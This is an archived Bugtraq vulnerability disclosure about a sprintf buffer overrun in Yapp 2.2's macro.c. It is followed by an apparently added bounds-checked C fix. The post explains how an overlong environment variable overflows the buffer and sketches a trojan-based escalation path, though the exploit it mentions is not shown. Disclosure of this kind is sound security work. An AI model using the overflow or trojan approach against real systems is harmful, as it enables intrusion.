This is my first Bugtraq post, hope I'm doing this right...

The Yapp Conferencing System Version 2.2 (and others?) has an exploitable buffer overrun in its macro processing code. On line 215 of macro.c, we see:

    sprintf(buff,"%s=%s",name,value);

The variable "value" is taken from the environment and is never checked to ensure that its length does not exceed the amount of space remaining in the buffer after "NAME=" has been inserted. It is trivial to overflow "buff" by defining "NAME" in the environment to contain a string longer than the size of "buff" (512 characters) minus the length of "NAME=".

I have included an exploit which I wrote for Intel 80x86/Linux; it uses the variable "EDITOR" (which I selected completely at random).

This bug is most likely not going to have serious security implications, since Yapp hardly ever runs setuid root (in fact, the README suggests creating a special user to run Yapp as), but I could see a situation where an attacker gains access to the special Yapp uid, replaces the Yapp binary with a trojan version, and then waits for root to run it.

If you're looking for a way to patch this hole, read the exploit source.
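The fix the post points at is a length check before the sprintf(3) call. The following is an added example, not Yapp's code: a bounds-checked replacement for the sprintf(buff,"%s=%s",name,value) pattern, using the 512-byte buffer size the post reports; the function names and the constructed EDITOR values are assumptions made for this example.

```c
/* Added example, not Yapp's code: bounds-checked replacement for
 * sprintf(buff, "%s=%s", name, value). BUFF_SIZE is the 512-byte buffer
 * the post reports; all function names here are hypothetical. */
#include <stdbool.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define BUFF_SIZE 512

/* Longest value that still fits in "name=value\0" within BUFF_SIZE. */
size_t max_value_len(const char *name)
{
    size_t overhead = strlen(name) + 2;          /* '=' and the NUL */
    return overhead >= BUFF_SIZE ? 0 : BUFF_SIZE - overhead;
}

/* Format "name=value" into buff. Returns false (and leaves buff empty)
 * when the result would not fit, instead of writing past the buffer. */
bool format_macro_assignment(char buff[BUFF_SIZE], const char *name,
                             const char *value)
{
    if (strlen(value) > max_value_len(name)) {   /* the check sprintf() lacked */
        buff[0] = '\0';
        return false;
    }
    /* snprintf never writes more than BUFF_SIZE bytes; its return value
     * is checked as well so truncation is reported rather than hidden. */
    int n = snprintf(buff, BUFF_SIZE, "%s=%s", name, value);
    return n >= 0 && (size_t)n < BUFF_SIZE;
}

/* Build a constructed EDITOR value of `len` bytes of 'A' and report
 * whether the checked formatter accepts it. */
bool editor_value_accepted(size_t len)
{
    char buff[BUFF_SIZE];
    char *value = malloc(len + 1);
    if (value == NULL) return false;
    memset(value, 'A', len);
    value[len] = '\0';
    bool ok = format_macro_assignment(buff, "EDITOR", value);
    free(value);
    return ok;
}

int main(void)
{
    printf("504-byte EDITOR: %s\n", editor_value_accepted(504) ? "accepted" : "rejected");
    printf("600-byte EDITOR: %s\n", editor_value_accepted(600) ? "accepted" : "rejected");
    return 0;
}
```

With a 6-character name like EDITOR the largest accepted value is 504 bytes (512 minus "EDITOR=" and the terminator); anything longer is refused rather than overflowing buff.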
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 13:40:13 PDT